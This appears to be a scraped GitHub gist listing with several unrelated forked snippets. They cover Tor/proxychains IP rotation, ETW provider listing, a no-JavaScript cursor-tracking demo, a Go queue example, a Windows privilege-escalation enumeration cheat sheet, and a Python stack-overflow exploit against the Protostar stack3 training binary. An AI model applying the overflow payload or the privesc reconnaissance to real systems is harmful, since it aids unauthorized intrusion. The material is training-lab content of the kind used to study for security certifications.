Skip to content

Instantly share code, notes, and snippets.

@miragshin
miragshin / how to use
Created August 10, 2022 07:10 — forked from carlware/how to use
proxychains and tor (change ip ~10 seconds)
# install
sudo apt-get install proxychains
sudo apt-get install tor
# then update the files /etc/proxychains.conf and /etc/tor/torrc with the given config
# restart tor server
sudo service restart tor
@miragshin
miragshin / Get-EtwTraceProvider.ps1
Created May 19, 2022 13:15 — forked from guitarrapc/Get-EtwTraceProvider.ps1
ETW (Event Tracing for Windows) Providers and their GUIDs for Windows 10 x64
#Requires -RunAsAdministrator
#Requires -Version 5.0
# requires Windows 10
Get-EtwTraceProvider | Select-Object SessionName, Guid | sort SessionName
# as Markdown
<#
#Requires -RunAsAdministrator
$result = Get-EtwTraceProvider | sort SessionName
$result | %{"|Name|GUID|";"|----|----|";}{"|$($_.SessionName)|$($_.Guid)|"}
#>
@miragshin
miragshin / noscript-tracking.go
Created October 12, 2020 10:14 — forked from wybiral/noscript-tracking.go
Tracking cursor position in real-time with remote monitoring (without JavaScript)
// Tracking cursor position in real-time without JavaScript
// Demo: https://twitter.com/davywtf/status/1124146339259002881
package main
import (
"fmt"
"net/http"
"strings"
)
@miragshin
miragshin / super_secret_gist
Last active October 31, 2021 22:41
Super Secret File
Super Secret file:
@miragshin
miragshin / kanal.go
Created April 3, 2019 13:11 — forked from Telmo/kanal.go
Golang: Playing with a queue channel
package main
import (
"bufio"
"fmt"
"math/rand"
"os"
"strconv"
"time"
)
@miragshin
miragshin / windows_privesc
Created March 25, 2018 22:41 — forked from sckalath/windows_privesc
Windows Privilege Escalation
// What system are we connected to?
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
// Get the hostname and username (if available)
hostname
echo %username%
// Get users
net users
net user [username]
#!/usr/bin/python
import subprocess
overflow="A"*64 + "\x24\x84\x04\x08"
my_echo = subprocess.Popen(['/bin/echo', overflow], stdout=subprocess.PIPE)
smash_the_stack = subprocess.Popen(['/opt/protostar/bin/stack3'], stdin=my_echo.stdout)

How to pass the OSCP

  1. Recon
  2. Find vuln
  3. Exploit
  4. Document it

Recon

Unicornscans in cli, nmap in msfconsole to help store loot in database.